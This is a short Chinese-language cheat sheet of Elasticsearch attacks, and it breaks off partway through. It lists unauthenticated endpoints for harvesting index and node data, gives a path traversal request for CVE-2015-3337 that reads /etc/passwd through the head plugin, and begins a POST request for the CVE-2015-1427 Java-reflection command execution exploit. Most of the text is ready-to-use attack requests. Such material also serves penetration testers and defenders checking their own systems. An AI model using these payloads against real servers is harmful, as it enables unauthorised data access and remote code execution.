一:未授权访问获取敏感信息
/_cat/indices
/_plugin/sql/
/_nodes
/_search
/_search?preety
/_status
二:目录遍历漏洞(cve-2015-3337)
安装“site”功能的插件后,插件目录使用…/向上跳转,导致目录穿越漏洞,可读取任意文件。未安装site功能插件的不受影响
/_cat/plugins:查看所有已安装的插件
一般复现以head插件为例,若查看存在head插件,burp
访问
http://your-ip:9200/_plugin/head/../../../../../../../../../etc/passwd
参考:https://blog.youkuaiyun.com/qq_36374896/article/details/84145527
三: CVE-2015-1427任意命令执行
JAVA反射执行代码
插入数据:
POST /website/blog/ HTTP/1.1
Host: ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Tri